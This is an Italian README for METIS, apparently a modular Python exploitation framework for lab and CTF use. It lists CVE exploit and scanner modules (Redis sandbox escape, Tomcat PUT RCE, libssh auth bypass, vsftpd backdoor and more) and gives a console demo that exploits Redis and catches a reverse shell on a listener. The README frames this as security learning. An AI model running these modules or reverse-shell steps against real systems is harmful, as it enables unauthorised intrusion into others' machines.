Framework di exploitation modulare in Python con una console in stile Metasploit, moduli Exploit e Auxiliary con registrazione automatica, controlli tri-stato e molteplici trasporti di sessione per target da laboratorio e CTF.
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
Un framework di exploitation in Python creato per l'apprendimento. Architettura modulare, console a tema, molteplici trasporti di sessione e una libreria in crescita di moduli CVE.
METIS è un framework di ricerca sulla sicurezza guidato dalla community. L'obiettivo è costruire una collezione in crescita di moduli contribuiti da ricercatori di sicurezza, sviluppatori e dalla più ampia community.
Hai uno scanner utile, un modulo ausiliario, un modulo exploit o altri strumenti di ricerca sulla sicurezza che vorresti condividere? Aggiungilo a METIS e apri una Pull Request.
Tutti i contributi sono benvenuti, a condizione che seguano la struttura dei moduli del progetto, gli standard di codifica e le linee guida per l'uso autorizzato.
Che tu stia aggiungendo un nuovo modulo CVE, migliorando un modulo esistente, correggendo un bug o costruendo nuove funzionalità del framework, i tuoi contributi possono aiutare a rendere METIS migliore per tutti.
Vedi Scrivere moduli di seguito per informazioni su come creare il tuo modulo.
METIS è un framework modulare C2/exploitation scritto in Python. Esegue una console interattiva in stile Metasploit dove selezioni moduli, imposti opzioni, esegui controlli e ottieni sessioni contro target di laboratorio.
È progettato per:
Non è progettato per:
.py in modules/ e si registra automaticamenteExploit (genera sessioni) e Auxiliary (scanner, enumeratori)check() a tre stati — ogni modulo può verificare prima di attaccare (VULNERABLE / SAFE / UNKNOWN)file: con barre di progresso liveKEY=VALUE| Modulo | Descrizione |
|---|---|
auxiliary/scanner/tcp_connect | Scanner di porte TCP threaded |
auxiliary/scanner/hikvision_cve_2017_7921 | Bypass autenticazione telecamera IP Hikvision + enumerazione utenti |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | Leak credenziali MikroTik WinBox |
auxiliary/scanner/redis_cve_2022_0543 | Rilevatore di escape dal sandbox Lua di Redis |
| Modulo | Tipo di sessione |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | Socket bind |
exploit/multi/http/ghost_cms_handlebars_rce | Socket reverse |
exploit/multi/http/langflow_rce_cve_2026_9198 | Socket reverse |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | Socket reverse |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | Socket reverse |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | Socket reverse |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | Webshell HTTP |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | Reverse ritardato (cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | Socket reverse |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | Canale Paramiko |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | Socket telnet raw |
Richiede Python 3.10+ e git.
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt:
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
Esegui:
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)
metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >